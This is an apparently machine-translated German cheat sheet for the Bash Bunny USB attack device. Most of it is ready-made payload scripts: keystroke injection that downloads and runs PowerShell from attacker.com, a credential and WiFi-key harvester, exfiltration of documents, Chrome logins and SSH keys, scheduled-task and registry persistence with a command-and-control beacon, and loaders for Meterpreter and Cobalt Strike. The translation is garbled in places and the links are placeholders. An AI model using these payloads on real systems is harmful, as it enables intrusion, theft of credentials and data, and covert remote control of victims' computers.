Bash Bunny Cheat Sheet
Überblick
Das Bash Bunny ist eine Multivektor-USB-Angriffs- und Automatisierungsplattform, die von Hak5 entwickelt wurde. Dieses fortschrittliche physikalische Penetrationstest-Tool kombiniert die Funktionalität mehrerer Angriffsvektoren zu einem einzigen USB-Gerät, so dass es ein wesentliches Werkzeug für Sicherheitsexperten, die physikalische Sicherheitsbewertungen durchführen. Das Bash Bunny kann verschiedene USB-Gerätetypen wie Tastaturen, Netzwerkadapter, serielle Geräte und Massenspeicher emulieren, so dass anspruchsvolle Angriffsszenarien, die traditionelle Sicherheitssteuerungen umgehen können und umfassende Tests der physischen Sicherheitshaltung einer Organisation ermöglichen.
ZEIT Warning: Der Bash Bunny ist ein leistungsstarkes Penetrationstest-Tool, das nur gegen eigene Systeme verwendet werden sollte oder eine ausdrückliche schriftliche Genehmigung zum Testen haben sollte. Unberechtigte Nutzung kann lokale Gesetze und Organisationspolitiken verletzen. Stellen Sie immer eine ordnungsgemäße Genehmigung vor der Durchführung physikalischer Sicherheitsbewertungen sicher.
Hardware Übersicht
Gerätespezifikationen
```bash
Bash Bunny Mark II Specifications
CPU: Quad-core ARM Cortex-A7 @ 900MHz RAM: 512MB DDR3 Storage: 8GB eMMC + MicroSD slot USB: USB 3.0 Type-A connector Network: Gigabit Ethernet adapter Wireless: 802.11 b/g/n WiFi Operating System: Custom Linux distribution Power: Bus-powered via USB Dimensions: 3.5" x 0.75" x 0.5" Weight: 1.2 oz (34g)
LED Status Indicators
Blue: Setup mode / Ready Red: Attack mode / Executing payload Green: Finished / Success Yellow: Special function / Warning Purple: Recovery mode ```_
Schaltstellungen
```bash
Physical switch positions
Position 0: Arming mode (payload development) Position 1: Attack payload 1 Position 2: Attack payload 2
Switch position detection in payloads
SWITCH_POSITION=$(cat /sys/class/gpio/gpio*/value) if [ "$SWITCH_POSITION" = "1" ]; then # Execute payload 1 elif [ "$SWITCH_POSITION" = "2" ]; then # Execute payload 2 fi ```_
Initial Setup und Konfiguration
Erstmalige Einrichtung
```bash
1. Connect Bash Bunny to computer
2. Set switch to position 0 (arming mode)
3. Wait for blue LED (setup mode)
4. Access via SSH or serial console
Default SSH credentials
ssh root@172.16.64.1
Password: hak5bunny
Default serial console (if SSH unavailable)
Use terminal emulator: 115200 baud, 8N1
screen /dev/ttyACM0 115200 ```_
Netzwerkkonfiguration
```bash
Configure WiFi (if available on Mark II)
wifi_connect() \\{ WIFI_SSID="YourNetwork" WIFI_PASS="YourPassword"
# Configure WiFi
cat > /etc/wpa_supplicant/wpa_supplicant.conf << EOF
network=\\{ ssid="$WIFI_SSID" psk="$WIFI_PASS" \\} EOF
# Start WiFi
wpa_supplicant -B -i wlan0 -c /etc/wpa_supplicant/wpa_supplicant.conf
dhclient wlan0
\\}
Configure Ethernet bridge
configure_ethernet() \\{ # Enable IP forwarding echo 1 > /proc/sys/net/ipv4/ip_forward
# Configure bridge interface
brctl addbr br0
brctl addif br0 eth0
brctl addif br0 usb0
ifconfig br0 up
# Start DHCP server
dnsmasq --interface=br0 --dhcp-range=172.16.64.10,172.16.64.100,12h
\\}
Update system
update_system() \\{ # Update package lists apt update
# Upgrade system
apt upgrade -y
# Install additional tools
apt install -y nmap netcat-openbsd curl wget git
\\} ```_
Struktur der Nutzlast
```bash
Bash Bunny payload structure
/root/udisk/payloads/ ├── switch1/ # Payloads for switch position 1 │ ├── payload.txt # Main payload script │ ├── config.txt # Configuration file │ └── resources/ # Additional resources ├── switch2/ # Payloads for switch position 2 │ ├── payload.txt │ ├── config.txt │ └── resources/ └── library/ # Payload library ├── credentials/ ├── exfiltration/ ├── execution/ ├── recon/ └── persistence/
Create payload directory
create_payload() \\{ local switch_pos="$1" local payload_name="$2"
mkdir -p "/root/udisk/payloads/switch$\\\\{switch_pos\\\\}"
cd "/root/udisk/payloads/switch$\\\\{switch_pos\\\\}"
# Create basic payload template
cat > payload.txt << 'EOF'
!/bin/bash
Title: Custom Payload
Description: Description of payload functionality
Author: Your Name
Version: 1.0
Category: Category
LED setup
LED SETUP
Attack mode configuration
ATTACKMODE HID STORAGE
Main payload logic
RUN WIN "cmd /c echo Hello World"
LED finish
LED FINISH EOF
echo "Payload created: /root/udisk/payloads/switch$\\\\{switch_pos\\\\}/payload.txt"
\\} ```_
Angriffsmodi und USB Emulation
HID (Human Interface Device) Modus
```bash
Keyboard emulation
ATTACKMODE HID
Basic keystroke injection
RUN WIN "cmd" DELAY 500 STRING "echo Hello from Bash Bunny" ENTER
Advanced keystroke sequences
RUN WIN "r" DELAY 500 STRING "powershell -WindowStyle Hidden -ExecutionPolicy Bypass" ENTER DELAY 1000 STRING "IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')" ENTER
Special key combinations
CTRL ALT DELETE ALT F4 CTRL SHIFT ESC WIN BREAK ```_
Speichermodus
```bash
Mass storage emulation
ATTACKMODE STORAGE
Configure storage image
STORAGE_IMAGE="/root/udisk/images/payload.img"
Create storage image
create_storage_image() \\{ local image_size="100M" local image_file="/root/udisk/images/custom.img"
# Create image file
dd if=/dev/zero of="$image_file" bs=1M count=100
# Format as FAT32
mkfs.vfat "$image_file"
# Mount and populate
mkdir -p /mnt/storage
mount -o loop "$image_file" /mnt/storage
# Add payload files
cp /root/payloads/* /mnt/storage/
# Unmount
umount /mnt/storage
echo "Storage image created: $image_file"
\\}
Autorun configuration
create_autorun() \\{ cat > /mnt/storage/autorun.inf << 'EOF' [autorun] open=payload.exe icon=icon.ico label=USB Drive EOF \\} ```_
Ethernet-Modus
```bash
Network adapter emulation
ATTACKMODE ETHERNET
Configure network settings
configure_ethernet_attack() \\{ # Set IP configuration ifconfig usb0 192.168.1.1 netmask 255.255.255.0
# Start DHCP server
dnsmasq --interface=usb0 --dhcp-range=192.168.1.10,192.168.1.100,12h
# Enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
# Configure iptables for NAT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -A FORWARD -i usb0 -o eth0 -j ACCEPT
iptables -A FORWARD -i eth0 -o usb0 -m state --state RELATED,ESTABLISHED -j ACCEPT
\\}
DNS spoofing
dns_spoof() \\{ # Configure dnsmasq for DNS spoofing cat > /etc/dnsmasq.conf << 'EOF' interface=usb0 dhcp-range=192.168.1.10,192.168.1.100,12h address=/evil.com/192.168.1.1 address=/login.company.com/192.168.1.1 EOF
# Start dnsmasq
dnsmasq -C /etc/dnsmasq.conf
\\} ```_
Serieller Modus
```bash
Serial device emulation
ATTACKMODE SERIAL
Configure serial parameters
configure_serial() \\{ # Set baud rate and parameters stty -F /dev/ttyGS0 115200 cs8 -cstopb -parenb
# Start serial communication
cat /dev/ttyGS0 &
echo "Serial mode configured"
\\}
Serial data capture
capture_serial() \\{ local output_file="/root/loot/serial_capture.txt"
# Capture serial data
cat /dev/ttyGS0|tee "$output_file" &
echo "Serial capture started: $output_file"
\\} ```_
zusammengesetzte Moden
```bash
Multiple attack modes simultaneously
ATTACKMODE HID STORAGE ATTACKMODE HID ETHERNET ATTACKMODE STORAGE ETHERNET ATTACKMODE HID STORAGE ETHERNET
Example: HID + Storage attack
composite_attack() \\{ # Configure composite mode ATTACKMODE HID STORAGE
# HID component: Open file explorer
RUN WIN "explorer"
DELAY 1000
# Storage component: Auto-execute payload
# Files on storage device will be accessible
# HID component: Navigate to storage
STRING "E:\\"
ENTER
DELAY 500
STRING "payload.exe"
ENTER
\\} ```_
Entwicklung der Nutzlast
Grundlegende Nutzlaststruktur
```bash
!/bin/bash
Title: Basic Payload Template
Description: Template for Bash Bunny payloads
Author: Security Researcher
Version: 1.0
Category: Template
Include Bash Bunny library
source /usr/lib/bashbunny/bunny_helpers.sh
LED status: Setup
LED SETUP
Configure attack mode
ATTACKMODE HID
Wait for target to recognize device
DELAY 2000
Main payload execution
main_payload() \\{ # Open command prompt RUN WIN "cmd" DELAY 500
# Execute commands
STRING "echo Payload executed successfully"
ENTER
# Additional payload logic here
# Clean up
STRING "exit"
ENTER
\\}
Execute main payload
main_payload
LED status: Finished
LED FINISH
Sync and exit
sync ```_
Advanced Payload Techniques
Credential Harvesting
```bash
!/bin/bash
Title: Credential Harvester
Description: Harvests stored credentials from target system
Author: Security Researcher
Version: 1.0
Category: Credentials
source /usr/lib/bashbunny/bunny_helpers.sh
LED SETUP ATTACKMODE HID STORAGE
Wait for target recognition
DELAY 3000
harvest_credentials() \\{ # Open PowerShell as administrator RUN WIN "powershell -WindowStyle Hidden -ExecutionPolicy Bypass" DELAY 1000
# Create credential harvesting script
STRING "Set-Location \$env:TEMP"
ENTER
DELAY 500
# Download and execute credential harvester
STRING "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/cred-harvest')"
ENTER
DELAY 2000
# Alternative: Use built-in Windows tools
STRING "cmdkey /list > credentials.txt"
ENTER
DELAY 500
# Export WiFi passwords
| STRING "netsh wlan show profiles | Select-String 'All User Profile' | ForEach-Object \\{\$.ToString().Split(':')[1].Trim()\\} | ForEach-Object \\{netsh wlan show profile name=\$ key=clear\\} > wifi_passwords.txt" | ENTER DELAY 1000
# Copy to Bash Bunny storage
STRING "Copy-Item credentials.txt E:\\"
ENTER
STRING "Copy-Item wifi_passwords.txt E:\\"
ENTER
# Clean up
STRING "Remove-Item credentials.txt, wifi_passwords.txt"
ENTER
STRING "exit"
ENTER
\\}
harvest_credentials LED FINISH sync ```_
Network Reconnaissance
```bash
!/bin/bash
Title: Network Reconnaissance
Description: Performs network discovery and reconnaissance
Author: Security Researcher
Version: 1.0
Category: Reconnaissance
source /usr/lib/bashbunny/bunny_helpers.sh
LED SETUP ATTACKMODE ETHERNET
Configure network
configure_network() \\{ ifconfig usb0 192.168.1.1 netmask 255.255.255.0 dnsmasq --interface=usb0 --dhcp-range=192.168.1.10,192.168.1.100,12h & echo 1 > /proc/sys/net/ipv4/ip_forward \\}
Network reconnaissance
network_recon() \\{ local loot_dir="/root/loot/network_recon_$(date +%Y%m%d_%H%M%S)" mkdir -p "$loot_dir"
# Wait for target to connect
sleep 10
# Get target IP
| local target_ip=$(arp -a | grep usb0 | awk '\\{print $2\\}' | tr -d '()') |
if [ -n "$target_ip" ]; then
echo "Target connected: $target_ip" > "$loot_dir/target_info.txt"
# Network discovery
nmap -sn 192.168.1.0/24 > "$loot_dir/network_discovery.txt" 2>&1
# Port scan target
nmap -sS -O "$target_ip" > "$loot_dir/target_portscan.txt" 2>&1
# ARP table
arp -a > "$loot_dir/arp_table.txt"
# Network configuration
ifconfig > "$loot_dir/network_config.txt"
# DNS queries
dig @8.8.8.8 company.com > "$loot_dir/dns_queries.txt" 2>&1
echo "Network reconnaissance completed: $loot_dir"
else
echo "No target connected" > "$loot_dir/error.txt"
fi
\\}
configure_network network_recon LED FINISH sync ```_
Daten Exfiltration
```bash
!/bin/bash
Title: Data Exfiltration
Description: Exfiltrates sensitive data from target system
Author: Security Researcher
Version: 1.0
Category: Exfiltration
source /usr/lib/bashbunny/bunny_helpers.sh
LED SETUP ATTACKMODE HID STORAGE
DELAY 3000
exfiltrate_data() \\{ # Open PowerShell RUN WIN "powershell -WindowStyle Hidden" DELAY 1000
# Create exfiltration script
STRING "Set-Location \$env:TEMP"
ENTER
DELAY 500
# Search for sensitive files
STRING "\$files = Get-ChildItem -Path C:\\ -Recurse -Include *.txt,*.doc,*.docx,*.pdf,*.xls,*.xlsx -ErrorAction SilentlyContinue|Where-Object \\\\{\$_.Length -lt 10MB\\\\}"
ENTER
DELAY 1000
# Create archive
STRING "Compress-Archive -Path \$files -DestinationPath sensitive_data.zip -Force"
ENTER
DELAY 5000
# Copy to Bash Bunny
STRING "Copy-Item sensitive_data.zip E:\\"
ENTER
DELAY 2000
# Search for browser data
STRING "\$chrome_path = \"\$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\""
ENTER
STRING "if (Test-Path \$chrome_path) \\\\{ Copy-Item \"\$chrome_path\\Login Data\" E:\\chrome_logins.db -Force \\\\}"
ENTER
DELAY 1000
# Search for SSH keys
STRING "\$ssh_path = \"\$env:USERPROFILE\\.ssh\""
ENTER
STRING "if (Test-Path \$ssh_path) \\\\{ Copy-Item \$ssh_path E:\\ssh_keys -Recurse -Force \\\\}"
ENTER
DELAY 1000
# Clean up
STRING "Remove-Item sensitive_data.zip -Force"
ENTER
STRING "exit"
ENTER
\\}
exfiltrate_data LED FINISH sync ```_
Persistenzmechanismus
```bash
!/bin/bash
Title: Persistence Mechanism
Description: Establishes persistence on target system
Author: Security Researcher
Version: 1.0
Category: Persistence
source /usr/lib/bashbunny/bunny_helpers.sh
LED SETUP ATTACKMODE HID STORAGE
DELAY 3000
establish_persistence() \\{ # Open PowerShell as administrator RUN WIN "powershell -WindowStyle Hidden -ExecutionPolicy Bypass" DELAY 1000
# Create persistence script
STRING "Set-Location \$env:TEMP"
ENTER
DELAY 500
# Download payload from Bash Bunny
STRING "Copy-Item E:\\persistence.ps1 .\\"
ENTER
DELAY 1000
# Create scheduled task for persistence
STRING "\$action = New-ScheduledTaskAction -Execute 'powershell.exe' -Argument '-WindowStyle Hidden -ExecutionPolicy Bypass -File C:\\Windows\\Temp\\persistence.ps1'"
ENTER
DELAY 500
STRING "\$trigger = New-ScheduledTaskTrigger -AtLogOn"
ENTER
DELAY 500
STRING "\$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -Hidden"
ENTER
DELAY 500
STRING "Register-ScheduledTask -TaskName 'SystemUpdate' -Action \$action -Trigger \$trigger -Settings \$settings -Force"
ENTER
DELAY 1000
# Registry persistence
STRING "New-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' -Name 'SystemUpdate' -Value 'powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\\Windows\\Temp\\persistence.ps1' -Force"
ENTER
DELAY 500
# Copy persistence script to system
STRING "Copy-Item persistence.ps1 C:\\Windows\\Temp\\ -Force"
ENTER
DELAY 500
# Set hidden attribute
STRING "Set-ItemProperty -Path C:\\Windows\\Temp\\persistence.ps1 -Name Attributes -Value Hidden"
ENTER
DELAY 500
# Clean up
STRING "Remove-Item persistence.ps1 -Force"
ENTER
STRING "exit"
ENTER
\\}
Create persistence payload file
create_persistence_payload() \\{ cat > /root/udisk/payloads/switch1/persistence.ps1 << 'EOF'
Persistence payload
while ($true) \\{ try \\{ # Beacon home $response = Invoke-WebRequest -Uri "http://attacker.com/beacon" -Method POST -Body "alive" -UseBasicParsing
# Execute commands if available
if ($response.Content -ne "ok") \\\\{
Invoke-Expression $response.Content
\\\\}
\\\\} catch \\\\{
# Silent failure
\\\\}
# Sleep for 1 hour
Start-Sleep 3600
\\} EOF \\}
create_persistence_payload establish_persistence LED FINISH sync ```_
Automatisierungsskripte
System zur Verwaltung von Nutzlasten
```bash
!/bin/bash
Bash Bunny payload management system
PAYLOAD_DIR="/root/udisk/payloads" LIBRARY_DIR="/root/udisk/payloads/library" LOOT_DIR="/root/loot"
Function to list available payloads
list_payloads() \\{ echo "[+] Available payloads:" echo ""
echo "Switch Position 1:"
if [ -f "$PAYLOAD_DIR/switch1/payload.txt" ]; then
| local title=$(grep "^# Title:" "$PAYLOAD_DIR/switch1/payload.txt" | cut -d: -f2 | xargs) | | local desc=$(grep "^# Description:" "$PAYLOAD_DIR/switch1/payload.txt" | cut -d: -f2 | xargs) | echo " Title: $title" echo " Description: $desc" else echo " No payload configured" fi echo ""
echo "Switch Position 2:"
if [ -f "$PAYLOAD_DIR/switch2/payload.txt" ]; then
| local title=$(grep "^# Title:" "$PAYLOAD_DIR/switch2/payload.txt" | cut -d: -f2 | xargs) | | local desc=$(grep "^# Description:" "$PAYLOAD_DIR/switch2/payload.txt" | cut -d: -f2 | xargs) | echo " Title: $title" echo " Description: $desc" else echo " No payload configured" fi echo ""
echo "Library payloads:"
find "$LIBRARY_DIR" -name "*.txt" -type f|while read -r payload; do
| local title=$(grep "^# Title:" "$payload" | cut -d: -f2 | xargs) | | local category=$(grep "^# Category:" "$payload" | cut -d: -f2 | xargs) | echo " $(basename "$payload" .txt): $title ($category)" done \\}
Function to install payload
install_payload() \\{ local payload_name="$1" local switch_position="$2"
| if [ -z "$payload_name" ] | | [ -z "$switch_position" ]; then |
echo "Usage: install_payload
local source_file="$LIBRARY_DIR/$payload_name.txt"
local dest_dir="$PAYLOAD_DIR/switch$switch_position"
local dest_file="$dest_dir/payload.txt"
if [ ! -f "$source_file" ]; then
echo "[-] Payload not found: $payload_name"
return 1
fi
mkdir -p "$dest_dir"
cp "$source_file" "$dest_file"
echo "[+] Payload installed: $payload_name -> switch position $switch_position"
# Copy any additional resources
local resource_dir="$LIBRARY_DIR/$(dirname "$payload_name")/resources"
if [ -d "$resource_dir" ]; then
cp -r "$resource_dir" "$dest_dir/"
echo "[+] Resources copied"
fi
\\}
Function to create new payload
create_payload() \\{ local payload_name="$1" local category="$2"
| if [ -z "$payload_name" ] | | [ -z "$category" ]; then |
echo "Usage: create_payload
local category_dir="$LIBRARY_DIR/$category"
local payload_file="$category_dir/$payload_name.txt"
mkdir -p "$category_dir"
cat > "$payload_file" << EOF
!/bin/bash
Title: $payload_name
Description: Description of payload functionality
Author: $(whoami)
Version: 1.0
Category: $category
Created: $(date)
source /usr/lib/bashbunny/bunny_helpers.sh
LED SETUP
Configure attack mode
ATTACKMODE HID
Wait for target recognition
DELAY 2000
Main payload logic
main_payload() \\{ # Add your payload logic here RUN WIN "cmd" DELAY 500 STRING "echo Hello from $payload_name" ENTER DELAY 1000 STRING "exit" ENTER \\}
Execute payload
main_payload
LED FINISH sync EOF
echo "[+] Payload template created: $payload_file"
echo "[+] Edit the file to implement your payload logic"
\\}
Function to backup payloads
backup_payloads() \\{ local backup_dir="/root/payload_backups" local backup_file="$backup_dir/payloads_backup_$(date +%Y%m%d_%H%M%S).tar.gz"
mkdir -p "$backup_dir"
tar -czf "$backup_file" -C /root/udisk payloads/
echo "[+] Payloads backed up: $backup_file"
\\}
Function to restore payloads
restore_payloads() \\{ local backup_file="$1"
| if [ -z "$backup_file" ] | | [ ! -f "$backup_file" ]; then |
echo "Usage: restore_payloads
echo "[+] Restoring payloads from: $backup_file"
tar -xzf "$backup_file" -C /root/udisk/
echo "[+] Payloads restored successfully"
\\}
Function to test payload syntax
test_payload() \\{ local switch_position="$1"
if [ -z "$switch_position" ]; then
echo "Usage: test_payload <switch_position>"
return 1
fi
local payload_file="$PAYLOAD_DIR/switch$switch_position/payload.txt"
if [ ! -f "$payload_file" ]; then
echo "[-] No payload found for switch position $switch_position"
return 1
fi
echo "[+] Testing payload syntax: $payload_file"
# Check bash syntax
bash -n "$payload_file"
if [ $? -eq 0 ]; then
echo "[+] Payload syntax is valid"
else
echo "[-] Payload syntax errors found"
return 1
fi
# Check for required functions
if ! grep -q "LED SETUP" "$payload_file"; then
echo "[!] Warning: LED SETUP not found"
fi
if ! grep -q "LED FINISH" "$payload_file"; then
echo "[!] Warning: LED FINISH not found"
fi
if ! grep -q "ATTACKMODE" "$payload_file"; then
echo "[!] Warning: ATTACKMODE not specified"
fi
\\}
Function to monitor loot
monitor_loot() \\{ echo "[+] Monitoring loot directory: $LOOT_DIR"
# Create loot directory if it doesn't exist
mkdir -p "$LOOT_DIR"
# Monitor for new files
inotifywait -m -r -e create,modify "$LOOT_DIR" --format '%w%f %e %T' --timefmt '%Y-%m-%d %H:%M:%S'|while read file event time; do
echo "[$time] $event: $file"
# Automatically compress large files
if [ "$event" = "CREATE" ] && [ -f "$file" ]; then
local file_size=$(stat -c%s "$file")
if [ "$file_size" -gt 10485760 ]; then # 10MB
echo " [+] Compressing large file: $file"
gzip "$file"
fi
fi
done
\\}
Main menu
show_menu() \\{ echo "Bash Bunny Payload Management System" echo "====================================" echo "1. List payloads" echo "2. Install payload" echo "3. Create new payload" echo "4. Test payload" echo "5. Backup payloads" echo "6. Restore payloads" echo "7. Monitor loot" echo "8. Exit" echo "" read -p "Select option: " choice
case $choice in
1) list_payloads ;;
2)
read -p "Payload name: " name
read -p "Switch position (1 or 2): " pos
install_payload "$name" "$pos"
;;
3)
read -p "Payload name: " name
read -p "Category: " cat
create_payload "$name" "$cat"
;;
4)
read -p "Switch position (1 or 2): " pos
test_payload "$pos"
;;
5) backup_payloads ;;
6)
read -p "Backup file path: " backup
restore_payloads "$backup"
;;
7) monitor_loot ;;
8) exit 0 ;;
*) echo "Invalid option" ;;
esac
\\}
Command line interface
if [ $# -eq 0 ]; then while true; do show_menu echo "" done else case "$1" in "list") list_payloads ;; "install") install_payload "$2" "$3" ;; "create") create_payload "$2" "$3" ;; "test") test_payload "$2" ;; "backup") backup_payloads ;; "restore") restore_payloads "$2" ;; "monitor") monitor_loot ;; *) echo "Usage: $0 [command] [args]" echo "Commands: list, install, create, test, backup, restore, monitor" ;; esac fi ```_
Automatisierte Payload Bereitstellung
```bash
!/bin/bash
Automated payload deployment and execution
DEPLOYMENT_CONFIG="deployment.conf" LOG_FILE="/root/logs/deployment.log" RESULTS_DIR="/root/results"
mkdir -p "$(dirname "$LOG_FILE")" "$RESULTS_DIR"
Function to log messages
log_message() \\{ local message="$1" echo "$(date '+%Y-%m-%d %H:%M:%S') - $message"|tee -a "$LOG_FILE" \\}
Function to deploy payload to switch position
deploy_payload() \\{ local payload_name="$1" local switch_position="$2" local target_description="$3"
log_message "Deploying payload: $payload_name to switch $switch_position"
log_message "Target: $target_description"
# Install payload
if install_payload "$payload_name" "$switch_position"; then
log_message "Payload deployed successfully"
# Create deployment record
cat > "$RESULTS_DIR/deployment_$\\\\{switch_position\\\\}_$(date +%Y%m%d_%H%M%S).json" << EOF
\\{ "payload_name": "$payload_name", "switch_position": "$switch_position", "target_description": "$target_description", "deployment_time": "$(date -Iseconds)", "status": "deployed" \\} EOF
return 0
else
log_message "Payload deployment failed"
return 1
fi
\\}
Function to execute payload
execute_payload() \\{ local switch_position="$1" local execution_timeout="$2"
log_message "Executing payload on switch $switch_position"
# Check if payload exists
local payload_file="/root/udisk/payloads/switch$switch_position/payload.txt"
if [ ! -f "$payload_file" ]; then
log_message "No payload found for switch $switch_position"
return 1
fi
# Create execution environment
local execution_dir="/tmp/payload_execution_$"
mkdir -p "$execution_dir"
cd "$execution_dir"
# Set timeout
if [ -n "$execution_timeout" ]; then
timeout "$execution_timeout" bash "$payload_file" 2>&1|tee -a "$LOG_FILE"
local exit_code=$?
else
bash "$payload_file" 2>&1|tee -a "$LOG_FILE"
local exit_code=$?
fi
# Clean up
cd /
rm -rf "$execution_dir"
if [ $exit_code -eq 0 ]; then
log_message "Payload execution completed successfully"
else
log_message "Payload execution failed with exit code: $exit_code"
fi
return $exit_code
\\}
Function to collect results
collect_results() \\{ local switch_position="$1" local collection_dir="$RESULTS_DIR/collection_$(date +%Y%m%d_%H%M%S)"
log_message "Collecting results from switch $switch_position"
mkdir -p "$collection_dir"
# Copy loot
if [ -d "/root/loot" ]; then
cp -r /root/loot/* "$collection_dir/" 2>/dev/null
log_message "Loot collected: $(find "$collection_dir" -type f|wc -l) files"
fi
# Copy storage contents
local storage_mount="/mnt/bunny_storage"
if mountpoint -q "$storage_mount"; then
cp -r "$storage_mount"/* "$collection_dir/" 2>/dev/null
log_message "Storage contents collected"
fi
# Generate collection report
cat > "$collection_dir/collection_report.txt" << EOF
Collection Report
Date: $(date) Switch Position: $switch_position Collection Directory: $collection_dir
Files Collected: $(find "$collection_dir" -type f -exec ls -lh \\{\\} \;|awk '\\{print $9, $5\\}')
Total Size: $(du -sh "$collection_dir"|cut -f1) EOF
log_message "Results collected in: $collection_dir"
\\}
Function to generate deployment report
generate_report() \\{ local report_file="$RESULTS_DIR/deployment_report_$(date +%Y%m%d).html"
log_message "Generating deployment report: $report_file"
cat > "$report_file" << 'EOF'
Bash Bunny Deployment Report
Generated: $(date)
Deployment: $payload_name
Switch Position: $switch_pos
Target: $target
Deployment Time: $deploy_time
EOF
log_message "Deployment report generated: $report_file"
\\}
Function to clean up old results
cleanup_results() \\{ local retention_days="$1"
if [ -z "$retention_days" ]; then
retention_days=30
fi
log_message "Cleaning up results older than $retention_days days"
# Clean up old deployment files
find "$RESULTS_DIR" -name "deployment_*.json" -mtime +$retention_days -delete
find "$RESULTS_DIR" -name "collection_*" -type d -mtime +$retention_days -exec rm -rf \\\\{\\\\} \;
# Clean up old logs
find "$(dirname "$LOG_FILE")" -name "*.log" -mtime +$retention_days -delete
log_message "Cleanup completed"
\\}
Main deployment workflow
main_deployment() \\{ local config_file="$1"
if [ ! -f "$config_file" ]; then
log_message "Configuration file not found: $config_file"
return 1
fi
log_message "Starting automated deployment workflow"
# Read configuration
source "$config_file"
# Deploy payloads
for i in $(seq 1 2); do
local payload_var="PAYLOAD_SWITCH_$i"
local target_var="TARGET_SWITCH_$i"
local timeout_var="TIMEOUT_SWITCH_$i"
local payload_name="$\\\\{!payload_var\\\\}"
local target_desc="$\\\\{!target_var\\\\}"
local timeout="$\\\\{!timeout_var\\\\}"
if [ -n "$payload_name" ]; then
if deploy_payload "$payload_name" "$i" "$target_desc"; then
# Wait for manual execution or auto-execute
if [ "$AUTO_EXECUTE" = "true" ]; then
sleep 5 # Allow time for deployment
execute_payload "$i" "$timeout"
collect_results "$i"
fi
fi
fi
done
# Generate report
generate_report
# Cleanup if configured
if [ "$AUTO_CLEANUP" = "true" ]; then
cleanup_results "$RETENTION_DAYS"
fi
log_message "Automated deployment workflow completed"
\\}
Create default configuration
create_default_config() \\{ cat > "$DEPLOYMENT_CONFIG" << 'EOF'
Bash Bunny Deployment Configuration
Payload assignments
PAYLOAD_SWITCH_1="credential_harvester" PAYLOAD_SWITCH_2="network_recon"
Target descriptions
TARGET_SWITCH_1="Windows 10 workstation - Finance department" TARGET_SWITCH_2="Ubuntu server - Development environment"
Execution timeouts (seconds)
TIMEOUT_SWITCH_1=300 TIMEOUT_SWITCH_2=600
Automation settings
AUTO_EXECUTE=false AUTO_CLEANUP=true RETENTION_DAYS=30 EOF
log_message "Default configuration created: $DEPLOYMENT_CONFIG"
\\}
Command line interface
case "$1" in
"deploy")
deploy_payload "$2" "$3" "$4"
;;
"execute")
execute_payload "$2" "$3"
;;
"collect")
collect_results "$2"
;;
"report")
generate_report
;;
"cleanup")
cleanup_results "$2"
;;
"workflow")
main_deployment "$2"
;;
"config")
create_default_config
;;
*)
echo "Usage: $0 [command] [args]"
echo "Commands:"
echo " deploy
Integration mit anderen Tools
Metasploit Integration
```bash
Generate Metasploit payloads for Bash Bunny
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > /root/udisk/payloads/switch1/payload.exe
Bash Bunny payload to execute Metasploit payload
cat > /root/udisk/payloads/switch1/payload.txt << 'EOF' ATTACKMODE HID STORAGE DELAY 3000 RUN WIN "E:\payload.exe" EOF ```_
Integrieren der Welt
```bash
Generate Empire stager for Bash Bunny
In Empire console:
(Empire) > usestager windows/launcher_bat
(Empire: stager/windows/launcher_bat) > set Listener http
(Empire: stager/windows/launcher_bat) > generate
Copy generated stager to Bash Bunny storage
cp empire_stager.bat /root/udisk/payloads/switch1/ ```_
Cobalt Strike Integration
```bash
Generate Cobalt Strike beacon for Bash Bunny
In Cobalt Strike:
Attacks -> Packages -> Windows Executable (S)
Save as beacon.exe
Bash Bunny payload for Cobalt Strike
cat > /root/udisk/payloads/switch1/payload.txt << 'EOF' ATTACKMODE HID STORAGE DELAY 3000 RUN WIN "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"& \\{(New-Object System.Net.WebClient).DownloadFile('http://192.168.1.100/beacon.exe', 'C:\Windows\Temp\beacon.exe'); Start-Process 'C:\Windows\Temp\beacon.exe'\\}\"" EOF ```_
Fehlerbehebung
Gemeinsame Themen
Gerät nicht erkannt
```bash
Check USB connection
lsusb|grep "Hak5"
Reset USB subsystem
echo 0 > /sys/bus/usb/devices/usb1/authorized echo 1 > /sys/bus/usb/devices/usb1/authorized
Check dmesg for errors
dmesg|tail -20 ```_
Payload Nicht ausführen
```bash
Check payload syntax
bash -n /root/udisk/payloads/switch1/payload.txt
Check file permissions
chmod +x /root/udisk/payloads/switch1/payload.txt
Test payload manually
cd /root/udisk/payloads/switch1/ bash payload.txt ```_
LED-Leuchten Nicht arbeiten
```bash
Check LED control
echo "LED SETUP" > /dev/ttyGS0 echo "LED FINISH" > /dev/ttyGS0
Reset LED controller
systemctl restart led-controller ```_
Speichermodus-Ausgaben
```bash
Check storage image
file /root/udisk/images/payload.img
Mount storage image manually
mkdir -p /mnt/test mount -o loop /root/udisk/images/payload.img /mnt/test ls -la /mnt/test umount /mnt/test ```_
Leistungsoptimierung
```bash
Optimize payload execution speed
Use DELAY sparingly
Combine multiple STRING commands
Use RUN for single commands
Monitor system resources
top free -h df -h
Clean up temporary files
rm -rf /tmp/ rm -rf /var/tmp/ ```_
Ressourcen
- Bash Bunny Offizielle Dokumentation
- Hak5 Community Forums
- Bash Bunny Payload Repository
- [Physical Penetration Testing Guide](LINK_7 -%20(LINK_7)
- [Social Engineering Toolkit](LINK_7
- [Physical Security Assessment Methodology](__LINK_7___
--
*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung des Bash Bunny für physikalische Penetrationstests und Sicherheitsbewertungen. Stellen Sie immer sicher, dass Sie eine ordnungsgemäße Genehmigung haben, bevor Sie körperliche Sicherheitstests durchführen und verantwortungsvolle Offenlegungspraktiken verfolgen. *